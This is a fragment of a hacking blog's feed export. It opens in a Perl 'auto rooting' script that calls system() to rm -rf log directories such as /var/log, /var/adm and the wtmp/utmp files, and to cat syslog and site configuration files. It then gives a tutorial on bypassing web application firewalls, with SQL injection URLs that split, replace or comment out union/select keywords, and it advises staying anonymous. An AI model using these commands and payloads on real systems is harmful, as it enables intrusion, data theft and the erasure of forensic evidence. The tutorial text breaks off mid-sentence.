#009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"rm -rf /var/apache/log"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"rm -rf /var/run/utmp"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"rm -rf /var/logs"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"rm -rf /var/log"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/sleep.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;sleep&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #cc66cc;"&gt;2&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"rm -rf /var/adm"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"rm -rf /etc/wtmp"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"rm -rf /etc/utmp"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"Done!"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; command&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;logs&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt; &lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cat /etc/syslog.conf"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;  &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt; &lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; command&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;config&lt;span style="color: #339933;"&gt;:;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt; &lt;a href="http://perldoc.perl.org/functions/system.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;system&lt;/span&gt;&lt;/a&gt; &lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;"cat ./../mainfile.php"&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;  &lt;a href="http://perldoc.perl.org/functions/print.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;print&lt;/span&gt;&lt;/a&gt; &lt;span style="color: red;"&gt;"&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;&lt;span style="color: #000099; font-weight: bold;"&gt;\n&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt; &lt;a href="http://perldoc.perl.org/functions/goto.html" style="color: #cf5329; text-decoration: none;"&gt;&lt;span style="color: #000066;"&gt;goto&lt;/span&gt;&lt;/a&gt; command&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;/pre&gt;&lt;span class="fullpost"&gt;  &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;copyright@2007 saifulfaizan&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/23134681-3336378982952708172?l=www.saifulfaizan.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/23134681/posts/default/3336378982952708172'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/23134681/posts/default/3336378982952708172'/><link rel='alternate' type='text/html' href='http://www.saifulfaizan.com/2011/12/viper-auto-rooting.html' title='Viper Auto Rooting'/><author><name>x-CODE-shadow</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_MmkIH6WGbYI/R4q6vasF8zI/AAAAAAAAAGY/x1TYR1MoOrE/S220/DSCI0128.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-23134681.post-5978886688891156130</id><published>2011-12-16T22:50:00.002+08:00</published><updated>2011-12-16T22:50:36.348+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Paper N Tutorial'/><title type='text'>Basic WAF bypassing and intrusion detection</title><content type='html'>&lt;span style="background-color: white; color: green; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&lt;br class="Apple-interchange-newline" /&gt;WAF Bypassing.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;WAF Bypassing - short explenation.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;WAF, Web application firewall. Is an attempt from administratord to secure the network.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;but whit only a filter we all know you can't do that 100%&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;WAF bypassing is not that easy remember this.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;WAF Bypassing is gambling.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;if the one word is filtered try another.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;stay trying and combining until you get a hit!&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;its like simon sais only this is harder.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;how does a WAF file look like?&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;/*&lt;br /&gt;$_GET = array_map('trim', $_GET);&lt;br /&gt;//$_POST = array_map('trim', $_POST);&lt;br /&gt;$_COOKIE = array_map('trim', $_COOKIE);&lt;br /&gt;$_REQUEST = array_map('trim', $_REQUEST);&lt;br /&gt;if(get_magic_quotes_gpc()):&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$_GET = array_map('stripslashes', $_GET);&lt;br /&gt;&amp;nbsp;&amp;nbsp; //$_POST = array_map('stripslashes', $_POST);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$_COOKIE = array_map('stripslashes', $_COOKIE);&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$_REQUEST = array_map('stripslashes', $_REQUEST);&lt;br /&gt;endif;&lt;br /&gt;$_GET = array_map('mysql_real_escape_string', $_GET);&lt;br /&gt;$_POST = array_map('mysql_real_escape_string', $_POST);&lt;br /&gt;$_COOKIE = array_map('mysql_real_escape_string', $_COOKIE);&lt;br /&gt;$_REQUEST = array_map('mysql_real_escape_string', $_REQUEST);&lt;br /&gt;*/&lt;br /&gt;// END OF ANTI MYSQL INJECTION&lt;br /&gt;&lt;br /&gt;/* Logging */&lt;br /&gt;&lt;br /&gt;$locatie = $_SERVER['REQUEST_URI'];&lt;br /&gt;$array = Array();&lt;br /&gt;$array[] = "mysql";&lt;br /&gt;$array[] = "query";&lt;br /&gt;$array[] = ")";&lt;br /&gt;$array[] = ";";&lt;br /&gt;$array[] = "}";&lt;br /&gt;$array[] = "&lt;script&gt;";$array[] = "&lt;/script&gt;";&lt;br /&gt;$array = Array();&lt;br /&gt;$array[] = "mysql";&lt;br /&gt;$array[] = ")";&lt;br /&gt;$array[] = ";";&lt;br /&gt;$array[] = "}";&lt;br /&gt;$array[] = "INSERT";&lt;br /&gt;$array[] = "DROPTABLE";&lt;br /&gt;$array[] = "TRUNCATE";&lt;br /&gt;&lt;br /&gt;$array[] = "UPDATE";&lt;br /&gt;$array[] = "COOKIE";&lt;br /&gt;&lt;br /&gt;$array[] = "FILES";&lt;br /&gt;$array[] = "POST";&lt;br /&gt;$array[] = "REQUEST";&lt;br /&gt;$array[] = "SERVER";&lt;br /&gt;$array[] = "INSERT";&lt;br /&gt;$array[] = "%40";&lt;br /&gt;$array[] = "%20";&lt;br /&gt;$array[] = "";&lt;br /&gt;$array[] = "DROPTABLE";&lt;br /&gt;$array[] = "TRUNCATE";&lt;br /&gt;$array[] = "WHERE";&lt;br /&gt;$array[] = "VALUES";&lt;br /&gt;$array[] = "SELECT";&lt;br /&gt;$array[] = "FROM";&lt;br /&gt;$array[] = "exit";&lt;br /&gt;$array[] = "'";&lt;br /&gt;$array[] = '"';&lt;br /&gt;$array[] = ",";&lt;br /&gt;$array[] = "`";&lt;br /&gt;$array[] = "echo";&lt;br /&gt;&lt;br /&gt;foreach($array As $posinject) {&lt;br /&gt;if(eregi($posinject,$locatie)) {&lt;br /&gt;$time = 'NOW()';&lt;br /&gt;&lt;br /&gt;mysql_query("INSERT INTO `injection`(`user_id`, `ip`, `location`, `date`)&lt;br /&gt;VALUES ('".ID."', '".$_SERVER[REMOTE_ADDR]."', '".$locatie."', '".$tijd."')") or die(mysql_error());&lt;br /&gt;&lt;br /&gt;header("location: news.php");&lt;br /&gt;&lt;br /&gt;exit();&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;}&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;This is a waf php script.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;as you can see the filter out some importand words and signs.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;it logs ip 2. !!! so its importand to be anonymous al the time!!!&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Now the part comes where we need to bypass all of this.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;WAF Bypassing - comments we can use.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;First of all i would like you to have a look at these comments.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;because these will bypass alot allready.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;how do we do this, where do we use them and what do they exactly do.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Well lets start whit /**/, (), #, --, +--+,--+-, -- -,,%20,/,//, &amp;lt; changing a . into , somethimes does the trick 2.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;/**/ this one is the most common to us.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;it allows us to execute full words in our query whitout them being filtered out.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;ofcource if the waf has more then one filter this could get tricky.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;using comment in practice:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=-1+/*!union*/+select+1,2,3--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;i get an error saying forbiden Somthing something ans whit the word select in it (if your lucky)&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;then i need to bypass the filter for select to.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=-1+/*!union*/+/*!select*/+1,2,3--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;but ad i see in my WAF doc i am not that lucky&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;and i get redirected to news.php because the file sais so.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;lets try changing that.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;what about this: union+select+1,2,3--+-&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Nope i got filtered out again.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;WAF Bypassing - Spliting, replacing keywords.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;To go further where i ended before i am going to split the code instead of using the comments.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=-1+uni&amp;gt;on+sel&amp;gt;ect+1,2,3--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;there wil be cases this will work do not forget this one.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;but not allways.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;There is another methode called replacing the key words.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www.[site].com/index.php?id=-1+UNIunionON+SeLselectECT+1,2,3--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;How does this work?&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;wel we all know the waf filteres out union and select.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;look closely.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;UNI&lt;/span&gt;&lt;span style="background-color: white; color: red; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;union&lt;/span&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;ON+ 